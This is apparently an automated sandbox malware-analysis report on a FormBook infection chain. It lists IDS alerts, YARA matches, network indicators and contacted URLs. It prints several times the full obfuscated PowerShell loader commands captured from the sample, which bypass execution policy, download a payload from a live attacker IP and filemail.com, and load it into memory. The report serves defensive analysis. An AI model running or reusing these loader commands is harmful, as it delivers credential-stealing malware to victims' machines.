lyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.10:49704 -> 146.70.113.200:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.10:49716

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
Source: Joe Sandbox View	ASN Name: TENET-1ZA TENET-1ZA

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.70.113.200Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_046B7A18 URLDownloadToFileW,

3_2_046B7A18

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: 1016.filemail.com

Source: powershell.exe, 00000003.00000002.1352224226.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethe
Source: powershell.exe, 00000003.00000002.1352224226.0000000004F32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
Source: powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFQ
Source: powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFg
Source: powershell.exe, 00000003.00000002.1355812282.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFy
Source: powershell.exe, 00000003.00000002.1354159145.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1352224226.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com
Source: powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
Source: powershell.exe, 00000003.00000002.1352224226.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.1614560671.0000000004F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1358235990.0000000008363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000003.00000002.1354159145.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1614560671.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716

Source: unknown

HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.10:49716 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
